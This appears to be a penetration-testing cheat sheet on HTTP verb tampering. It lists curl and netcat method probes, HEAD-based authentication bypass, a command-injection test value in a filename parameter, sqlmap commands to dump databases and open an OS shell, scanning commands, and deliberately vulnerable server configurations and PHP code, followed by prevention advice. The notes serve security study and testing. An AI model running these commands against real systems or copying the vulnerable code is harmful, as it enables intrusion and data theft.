1. HTTP verb Tampering

1. Identifying Protected Pages (Basic Authentication Bypass)

Using curl to Check for Authentication Prompts

curl -i http://target.com/admin/reset.php
curl -i http://target.com/admin/

Using Burp Suite to Intercept and Examine Requests

• Use Burp Suite Proxy to capture HTTP requests.

• Inspect responses for authentication requirements.

2. Identifying Allowed HTTP Methods

Using curl to Send OPTIONS Request

curl -i -X OPTIONS http://target.com/admin/reset.php

Using Netcat to Check Allowed Methods

nc -nv target.com 80
OPTIONS / HTTP/1.1
Host: target.com

3. Exploiting Authentication Bypass

Using HEAD Method for Bypass

curl -i -X HEAD http://target.com/admin/reset.php

• Manually change HTTP method in Burp Suite.

Bypassing Security Filters by Changing HTTP Method

• Modify requests from POST to GET or HEAD.

• Use Burp Suite to modify request methods manually.

Testing Command Injection After Bypass

curl -X GET "http://target.com/page?filename=file1; touch file2;"

4. Insecure Web Server Configurations

Vulnerable Apache Configuration

<Limit GET>
    Require valid-user
</Limit>

• Can be bypassed using HEAD or OPTIONS methods.

Vulnerable Tomcat Configuration

<http-method>GET</http-method>

Vulnerable ASP.NET Configuration

<allow verbs="GET" roles="admin">

5. Testing for SQL Injection with SQLmap

sqlmap -u "http://target.com/page?code=test" --dbs # Enumerate databases
sqlmap -u "http://target.com/page?code=test" --dump # Dump database content
sqlmap -u "http://target.com/page?code=test" --os-shell # Get OS shell

6. Fuzzing HTTP Methods

Using wfuzz

wfuzz -c -z file,verbs.txt http://target.com/admin/FUZZ

7. Web Scanning and Reconnaissance

Nmap (Port Scanning)

nmap -sV -sC target.com
nmap -p 80,443,8080 target.com

Nikto (Web Server Scanning)

nikto -h target.com

Gobuster (Directory Bruteforce)

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

8. Burp Suite Tools Overview

• Burp Intruder: Used for fuzzing, brute-forcing, and other automated attacks.

• Burp Repeater: Used for manually crafting and replaying HTTP requests.

• Burp Scanner: Used for automated vulnerability scanning.

9. HTTP Verb Tampering Overview

Common HTTP Verbs

• HEAD: Retrieves headers only.

• PUT: Replaces a resource.

• DELETE: Removes a resource.

• OPTIONS: Lists allowed methods.

• PATCH: Partially modifies a resource.

Causes of Vulnerabilities

• Insecure Web Server Configurations

• Inconsistent Application Logic

• Weak Input Validation

Example of Insecure Coding (PHP)

if(preg_match($pattern, $_POST["code"])) {
    $query = "SELECT * FROM ports WHERE port_code LIKE '%" . $_REQUEST["code"] . "%'";
}

• Filters $_POST but uses $_REQUEST, allowing SQL injection via GET requests.

10. Prevention Strategies

• Apply consistent authentication rules across all HTTP methods.

• Use strict input validation and sanitization.

• Disable unnecessary HTTP methods.

• Configure web servers to restrict HTTP methods properly.

• Implement Content Security Policies (CSPs) and Web Application Firewalls (WAFs).

Key Takeaways

• HTTP Verb Tampering can bypass authentication and security controls.

• Testing HTTP methods is crucial for security assessments.

• Web server configurations and application code must be securely implemented.

• Regular security audits and penetration testing help mitigate risks.